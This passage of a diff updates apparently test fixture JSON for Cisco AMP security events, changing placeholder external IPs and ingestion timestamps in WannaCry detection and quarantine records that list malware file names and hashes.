"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:39.764078800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -3441,7 +3441,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3491,7 +3491,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3508,8 +3508,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025302577Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:39.764083500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3531,7 +3531,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3581,7 +3581,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3598,8 +3598,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025304802Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":783000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:39.764088400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":783000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3621,7 +3621,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3678,7 +3678,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3695,8 +3695,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025307041Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":727000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", + "ingested": "2021-12-09T13:35:39.764094300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":727000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3718,7 +3718,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3779,7 +3779,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3796,8 +3796,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025309292Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", + "ingested": "2021-12-09T13:35:39.764098800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3819,7 +3819,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3869,7 +3869,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3886,8 +3886,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025311506Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:39.764104Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3909,7 +3909,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3955,7 +3955,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3972,8 +3972,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025313723Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":504000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:39.764110200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":504000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3995,7 +3995,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4054,7 +4054,7 @@ "e889544aff85ffaf8b0d0da705105dee7c97fe26" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4071,8 +4071,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025315961Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":426000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "ingested": 